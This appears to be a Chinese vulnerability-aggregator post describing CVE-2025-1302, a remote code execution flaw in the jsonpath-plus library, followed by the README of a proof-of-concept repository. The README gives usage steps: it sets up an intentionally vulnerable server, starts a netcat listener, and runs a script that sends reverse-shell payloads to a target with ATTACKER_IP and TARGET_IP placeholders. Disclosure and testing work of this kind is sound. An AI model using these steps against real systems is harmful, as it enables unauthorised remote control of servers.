jsonpath-plus 远程代码执行漏洞

漏洞信息

漏洞名称: jsonpath-plus 远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2025-1302

漏洞类型: 命令执行

漏洞等级: 高危

漏洞描述: 受影响产品: jsonpath-plus是一个用于处理JSONPath表达式的JavaScript库,广泛应用于Node.js环境中,用于查询和操作JSON数据。它通常被集成到各种Web应用和服务中,用于数据处理和API响应处理。由于其广泛的应用场景,该库的安全问题可能影响到大量依赖它的系统。

漏洞解释: 该漏洞属于远程代码执行(RCE)类型,存在于jsonpath-plus库的10.3.0之前版本中。漏洞的技术根源在于库对JSONPath过滤器的处理不当,允许攻击者通过构造恶意的JSONPath过滤器,在服务器上执行任意代码。这种漏洞通常由于输入验证不充分或执行环境隔离不足导致。

影响分析: 此漏洞的安全风险极高,攻击者可以利用此漏洞在目标服务器上执行任意命令,可能导致完全控制受影响的系统。攻击不需要用户认证,可以远程自动化执行,极大地增加了攻击的潜在危害和范围。成功的利用可能导致数据泄露、服务中断,甚至作为进一步攻击的跳板。因此,所有使用受影响版本jsonpath-plus库的系统都应尽快升级到10.3.0或更高版本,以缓解此漏洞带来的风险。

产品名称: jsonpath-plus

影响版本: version < 10.3.0

来源: https://github.com/abrewer251/CVE-2025-1302_jsonpath-plus_RCE

类型: CVE-2025:github search

仓库文件

  • LICENSE
  • README.md
  • package.json
  • poc.py

来源概述

CVE-2025-1302_jsonpath-plus_RCE

PoC exploit and vulnerable server demo for CVE-2025-1302 in jsonpath-plus.

Overview

This repository demonstrates a remote code execution vulnerability (CVE-2025-1302) in versions of the jsonpath-plus library prior to 10.3.0. It includes:

  • server.js: A minimal Express HTTP server running jsonpath-plus@10.2.0, exposing an endpoint vulnerable to malicious JSONPath filters.
  • cve_2025_1302_poc.py: A standalone Python PoC script that sends reverse-shell payloads to the vulnerable server.
  • package.json: Defines the server dependencies and pins jsonpath-plus to the vulnerable version.

Getting Started

Prerequisites

  • Node.js v14 or higher
  • Python 3.7 or higher
  • Netcat (or equivalent) for catching reverse shells

Installation

  1. Clone the repository

    1
    2
    git clone https://github.com/<YOUR-ORG>/cve-2025-1302-poc.git
    cd cve-2025-1302-poc

  2. Install server dependencies

    1
    npm install

  3. Ensure Python dependencies

    1
    pip install requests tqdm

Usage

1. Launch the Vulnerable Server

1
2
3
npm start
## or
node server.js

The server listens on port 3000 and accepts POST requests at /query with JSON { "path": "<JSONPath filter>" }.

2. Start a Listener

On your attacker machine, start a netcat listener:

1
nc -lvnp 4444

3. Run the Python PoC

1
2
3
4
5
6
7
python3 cve_2025_1302_poc.py \
  --url http://<TARGET_IP>:3000/query \
  --ip <ATTACKER_IP> \
  --port 4444 \
  [--payload-file payloads.txt] \
  [--delay 5] \
  [--output results.json]
  • --payload-file: Optional file containing one JSONPath template per line (use {ip} and {port} placeholders).
  • --delay: Seconds to wait before sending payloads (default: 0).
  • --output: Path to save a JSON log of requests and responses.

If successful, you’ll receive a reverse shell in your listener.

package.json

1
2
3
4
5
6
7
8
9
10
11
12
13
{
  "name": "jpoc",
  "version": "1.0.0",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "jsonpath-plus": "10.2.0"
  }
}
  • Pinning jsonpath-plus to 10.2.0 ensures the vulnerability is present.
  • The start script runs the vulnerable server.

Contributing

  1. Fork this repository.
  2. Create a branch for your feature: git checkout -b feature/xyz.
  3. Commit your changes: `git commit -m “Add xyz feature”
  4. Push to your branch: git push origin feature/xyz
  5. Open a Pull Request.

License

This PoC is provided for educational and testing purposes only. Use at your own risk.

Github Poc
#命令执行 #CVE-2025:github search
jsonpath-plus 远程代码执行漏洞
http://example.com/2025/07/24/github_3544289578/
作者
lianccc
发布于
2025年7月24日
许可协议